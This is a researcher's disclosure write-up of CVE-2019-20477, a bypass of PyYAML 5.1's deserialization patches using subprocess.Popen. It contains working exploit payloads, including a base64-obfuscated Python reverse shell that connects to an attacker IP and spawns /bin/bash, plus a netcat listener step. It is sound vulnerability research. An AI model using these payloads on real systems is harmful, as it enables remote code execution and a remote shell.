[CVE-2019-20477] - 0Day YAML Deserialization Attack on PyYAML Version <= 5.1.2

Overview of YAML

According to Wikipedia, YAML (a recursive acronym for "YAML Ain't Markup Language", originally "Yet Another Markup Language") is a human-readable data serialization language. It is commonly used for configuration files and in applications where data is stored or transmitted. It uses Python-style indentation to indicate nesting, as well as a more compact format that uses [] for lists and {} for maps, which makes YAML a superset of JSON.

Example:

Un-Serialized Data:

{'a':'hello','b':'world','c':['this', 'is',' yaml']}

YAML Serialized Data:


a: hello
b: world
c:
- this
- is
- ' yaml'

YAML is used in many kinds of applications regardless of platform, whether a web application, a thick client application, a mobile application, and so on. See https://yaml.org/ to learn more about the YAML project.

Vulnerability Background

YAML, as implemented in PyYAML, is vulnerable because it can serialize and deserialize custom objects, including instances of arbitrary classes and references to callables. PyYAML was already known to be vulnerable to deserialization attacks until its maintainer released version 5.1, which introduced restrictions that were expected to stop these attacks.

These restrictions can easily be bypassed under certain conditions, which can be expected to hold most of the time. I found this last year while creating a challenge for a CTF.

PyYAML <5.1

In PyYAML version < 5.1 there is no restriction, and one can easily perform a deserialization attack by crafting a payload. For example, one can build a custom object whose __reduce__ method returns os.system() and its argument, so that code is executed when the object is deserialized, as shown below.

Payload creation:

import yaml
import os


class Payload(object):
    def __reduce__(self):
        return (os.system,('ls',))


serialized_data = yaml.dump(Payload())  # serializing data

print(serialized_data)

The payload will look like this:

!!python/object/apply:nt.system [ls]
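The module name in this tag depends on the platform where the payload was generated. The short sketch below illustrates why the tag reads nt.system here: os.system is provided by a platform-specific built-in module (nt on Windows, posix on Unix-like systems), so a payload dumped on one platform may need its tag adjusted for the other. The variable names are illustrative only.

```python
import os

# os.system is re-exported from a platform-specific built-in module,
# and that module's name is what ends up in the dumped tag.
module_name = os.system.__module__  # 'nt' on Windows, 'posix' on Unix-like systems
tag = "!!python/object/apply:" + module_name + "." + os.system.__name__

print(tag)
```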

This payload can be deserialized using PyYAML's load() method. By default, load() uses an unsafe deserialization loader if “Loader” is not specified as a parameter. The code that deserializes the payload can be written as:

import yaml

data = b"""!!python/object/apply:nt.system [ls]"""
deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

This reconstructs the os.system() call with the parameter “ls”, which leads to code execution, and we get a directory listing:

test.py
abc.txt
test.txt

PyYAML >=5.1 <=5.1.2

In version 5.1, the maintainer added two restrictions to stop RCE.

Let us deserialize a serialized method of a Python built-in module with the default load() in version 5.1.2:

import yaml
data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

Output:

C:/Users/j0lt/paper_files/main.py:4: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.
deserialized_data = yaml.load(data)  # serializing data
Traceback (most recent call last):
File "C:/Users/j0lt/paper_files/main.py", line 4, in <module>
deserialized_data = yaml.load(data)  # serializing data
File "C:\Users\j0lt\venv\lib\site-packages\yaml\__init__.py", line 114, in load
return loader.get_single_data()
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 43, in get_single_data
return self.construct_document(node)
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 94, in construct_object
data = constructor(self, tag_suffix, node)
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 624, in construct_python_object_apply
instance = self.make_python_instance(suffix, node, args, kwds, newobj)
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 570, in make_python_instance
node.start_mark)
yaml.constructor.ConstructorError: while constructing a Python instance
expected a class, but found <class 'builtin_function_or_method'>
in "", line 1, column 1:
!!python/object/apply:time.sleep ...
^

It failed because version 5.1.2 does not allow arbitrary Python callables to be deserialized when load() is called without a Loader or with Loader=SafeLoader. Only class-type objects that are defined in the script or imported by it are allowed to be deserialized.

Why does this happen under these conditions? The changes made to PyYAML's constructor.py are responsible. Two patches in version 5.1 restrict deserialization of built-in functions and methods, and the use of classes that are neither imported nor defined in the deserializing code.

Code of constructor.py of PyYAML version >=5.1:

Patch 1:

Patch 2:

Execution stops with an error if either of the highlighted conditions above is True.
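As a rough illustration of the two checks, here is a simplified, standalone sketch. It is not the code from constructor.py: the function name check_instance_target and the use of ValueError are assumptions made for this example (PyYAML raises its own ConstructorError), and only the two conditions discussed in this article are modelled.

```python
import subprocess  # loaded here so that "subprocess" is present in sys.modules
import sys
import time


def find_python_name(name):
    """Patch 1 (simplified): the module must already be in sys.modules."""
    module_name, _, object_name = name.rpartition(".")
    if module_name not in sys.modules:
        raise ValueError("module %r is not imported" % module_name)
    module = sys.modules[module_name]
    if not hasattr(module, object_name):
        raise ValueError("cannot find %r in module %r" % (object_name, module_name))
    return getattr(module, object_name)


def check_instance_target(name):
    """Patch 2 (simplified): the resolved object must be a class."""
    cls = find_python_name(name)
    if not isinstance(cls, type):
        raise ValueError("expected a class, but found %r" % type(cls))
    return cls


for candidate in ("time.sleep", "subprocess.Popen", "not_imported_module.thing"):
    try:
        check_instance_target(candidate)
        print(candidate, "-> allowed")
    except ValueError as exc:
        print(candidate, "-> rejected:", exc)
```

In this sketch a name is accepted only when its module is already loaded and the resolved attribute is a class, which mirrors the two conditions described for the patches.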

In Patch 1, sys.modules lists all the modules that have been loaded by the running code. Let us check whether the “time” module is among them:

import yaml
import sys

print(sys.modules['time'])

Output:

<module 'time' (built-in)>

The output shows that the “time” module is loaded. How? PyYAML's own source files, such as constructor.py, import the datetime module, and the datetime module in turn uses the “time” module.

Code of datetime module:

Since the “time” module is loaded, sys.modules lists “time”, the condition becomes False, and the code moves forward.

Evidently, the maintainer wanted to allow deserialization only of classes or modules that are used in the deserializing code. Hence, it is not a proper patch.

The highlighted condition becomes False, and the data is deserialized, in the following cases:

1. The class or module is explicitly imported in the deserializing code.
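The effect of indirect imports on sys.modules can be observed directly. The sketch below uses a hypothetical helper, is_loaded, to show that a module counts as loaded for the whole process once anything has imported it, whether or not the deserializing script imported it itself.

```python
import sys
import datetime  # constructor.py imports datetime, as described above


def is_loaded(module_name):
    """Return True if the module is already present in sys.modules."""
    return module_name in sys.modules


# Modules pulled in as a side effect of other imports are listed too.
for name in ("datetime", "time", "surely_not_a_real_module_xyz"):
    print(name, is_loaded(name))
```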

Example:

import yaml

import time
data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

2. A module imported in the deserializing code itself uses the specified class or module. For example, PyYAML’s constructor.py imports datetime, and datetime imports time, so time is present in sys.modules.
Example:

import yaml

data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

3. The deserializing code defines a custom class that provides the required method as its class method.

import yaml

class time:
    @staticmethod
    def sleep(t):
        # str() avoids a TypeError when t is an int such as 10
        print("Sleeping " + str(t) + " seconds")

data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

This will not cause a 10-second delay but will print “Sleeping 10 seconds” to the console.

In all of the above cases, the first patch is bypassed and the code moves on to the next steps.

Next, the code checks whether “sleep” is an attribute of the module “time” using hasattr().

If object_name is an attribute of the module, the condition is False and the code jumps to the return statement on line 544. There, getattr(module, object_name) returns the attribute object_name of the module, which is represented as shown below.

Code:

import yaml
import sys

print(getattr(sys.modules['time'], 'sleep'))

Output:

<built-in function sleep>

The output shows the type of the attribute “sleep” in the “time” module. It clearly shows that “sleep” exists as a standalone function in the time module and not as a class or class method.

Patch 2 uses isinstance(cls, type) to check what kind of attribute the deserialized data refers to in the specified module or class. If the attribute is not a class, the condition becomes True and execution stops with an error, as in the case of “time.sleep”: “sleep” is of type “built-in function”, not a class, so isinstance() returns False.

Code:

import yaml
import sys

cls = getattr(sys.modules['time'], 'sleep')
print(isinstance(cls, type))

Output:

False

We can bypass this by deserializing only objects that are classes, not class methods or any other type of module attribute. In short, “sleep” would need to be a class instead of a function for it to be executed.

Running the same code with PyYAML version < 5.1, or with load(data, Loader=Loader) or load(data, Loader=UnsafeLoader), produces the output after a delay of 10 seconds, which shows that “time.sleep(10)” was executed. The “None” is the return value of “time.sleep(10)”.

Output:

None

In PyYAML version < 5.1, constructor.py does not have these patches, so the payload works.

We now have everything we need to create our payload. os.system() cannot be used: it executes commands in PyYAML version < 5.1, but in version >= 5.1 it is blocked by Patch 2, because system is not a class in the os module. Instead, we will use subprocess.Popen. Popen is a class in the subprocess module, so it passes Patch 2, and as long as subprocess is already present in sys.modules it passes Patch 1 as well. This is therefore a bypass of the patches applied for CVE-2017-18342.
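The difference between the two candidates can be checked with the same isinstance() test used earlier. In this sketch the helper name passes_patch_2 is hypothetical; it applies the class check to each candidate without calling any of them.

```python
import os
import subprocess
import time


def passes_patch_2(obj):
    """Mirror the isinstance(cls, type) check: only classes pass."""
    return isinstance(obj, type)


candidates = {
    "os.system": os.system,
    "time.sleep": time.sleep,
    "subprocess.Popen": subprocess.Popen,
}

for name, obj in candidates.items():
    print(name, type(obj).__name__, passes_patch_2(obj))
```

Only subprocess.Popen is a class, which is why it is the one chosen for the payload.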

Example Scenario

Let us consider a web application running on Flask that uses yaml.load() to deserialize user-supplied input. The Python environment used is Python 2.x.
Code:



 

The application is running at port 8080.

In the browser, the page is shown at http://:8080/

Now let’s try a payload that gives us a reverse shell through RCE on port 1337 of the attacker machine.
We will use msfvenom and basic YAML syntax to generate the payload for the reverse shell.

First, we need to generate a Python payload that gives us a reverse shell when executed. For that, use msfvenom:

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw

It will give output like this:

"exec('aW1wb3J0IHNvY2tldCAgICAsICBzdWJwcm9jZXNzICAgICwgIG9zICAgICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjAuMTEiICAgICAgIDsgICAgICAgICBwb3J0PTEzMzcgICAgICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAsICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgcG9ydCkpICAgICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgMCkgICAgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAxKSAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgIDIpICAgICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

So, our payload will look like this:

!!python/object/apply:subprocess.Popen
- !!python/tuple
  - python
  - -c
  - "exec('aW1wb3J0IHNvY2tldCAgICAsICBzdWJwcm9jZXNzICAgICwgIG9zICAgICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjAuMTEiICAgICAgIDsgICAgICAgICBwb3J0PTEzMzcgICAgICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAsICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgcG9ydCkpICAgICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgMCkgICAgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAxKSAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgIDIpICAgICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

Note that we are not using dump() to generate this payload because it contains both single and double quotes. We can either build it manually like this or use peas, available on GitHub (https://github.com/j0lt-github/python-deserialization-attack-payload-generator).

This payload, encoded in base64, is:

ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gcHl0aG9uCiAgLSAtYwogIC0gImV4ZWMoJ2FXMXdiM0owSUhOdlkydGxkQ0FnSUNBc0lDQnpkV0p3Y205alpYTnpJQ0FnSUN3Z0lHOXpJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQm9iM04wUFNJeE9USXVNVFk0TGpBdU1URWlJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQndiM0owUFRFek16Y2dJQ0FnSUNBZ095QWdJQ0FnSUNBZ0lITTljMjlqYTJWMExuTnZZMnRsZENoemIyTnJaWFF1UVVaZlNVNUZWQ0FnSUNBc0lDQnpiMk5yWlhRdVUwOURTMTlUVkZKRlFVMHBJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQnpMbU52Ym01bFkzUW9LR2h2YzNRZ0lDQWdMQ0FnY0c5eWRDa3BJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQnZjeTVrZFhBeUtITXVabWxzWlc1dktDa2dJQ0FnTENBZ01Da2dJQ0FnSUNBZ095QWdJQ0FnSUNBZ0lHOXpMbVIxY0RJb2N5NW1hV3hsYm04b0tTQWdJQ0FzSUNBeEtTQWdJQ0FnSUNBN0lDQWdJQ0FnSUNBZ2IzTXVaSFZ3TWloekxtWnBiR1Z1YnlncElDQWdJQ3dnSURJcElDQWdJQ0FnSURzZ0lDQWdJQ0FnSUNCd1BYTjFZbkJ5YjJObGMzTXVZMkZzYkNnaUwySnBiaTlpWVhOb0lpaz0nLmRlY29kZSgnYmFzZTY0JykpIg==
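The encoding step itself is plain base64 over the YAML text. A minimal sketch follows, using a harmless placeholder document in place of the payload. That the example application expects base64 input is inferred from this step, since the application code is not reproduced here.

```python
import base64

# Harmless placeholder document; the YAML text to submit would go here instead.
yaml_text = "a: hello\nb: world\n"

# Encode the UTF-8 bytes of the YAML text and keep the result as an ASCII string.
encoded = base64.b64encode(yaml_text.encode("utf-8")).decode("ascii")
print(encoded)

# Decoding restores the original text, including newlines and indentation.
decoded = base64.b64decode(encoded).decode("utf-8")
```

Because YAML is sensitive to whitespace, encoding the text this way preserves the indentation of nested list items during submission.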

Open a port for the incoming shell connection using netcat.

Now try to submit this payload.

It will show an “Internal Server Error” in the browser.

But we will get a reverse connection in netcat.

Finally, we were able to bypass all the restrictions and proved that the applied patches can be bypassed. I registered a CVE for this (CVE-2019-20477).

The maintainer released a stable and correctly patched version a month after my disclosure. The current version of PyYAML, 5.3.x, is safe. However, some applications may still be using an old version of PyYAML and remain vulnerable to attacks.

For more information, refer to my research paper on Exploit-DB.
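Independently of the installed version, code that only needs plain data can avoid Python-specific tags altogether. The sketch below assumes PyYAML is installed and uses yaml.safe_load(), which does not construct python/object tags, so the document is rejected and nothing is executed. The variable names are illustrative.

```python
import yaml

# A document carrying a Python-specific tag, with a harmless command as its argument.
untrusted = "!!python/object/apply:subprocess.Popen [[echo, hello]]"

try:
    yaml.safe_load(untrusted)
    rejected = False
except yaml.YAMLError as exc:
    # safe_load has no constructor for python/* tags, so it raises instead of running anything.
    rejected = True
    print("rejected:", type(exc).__name__)
```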
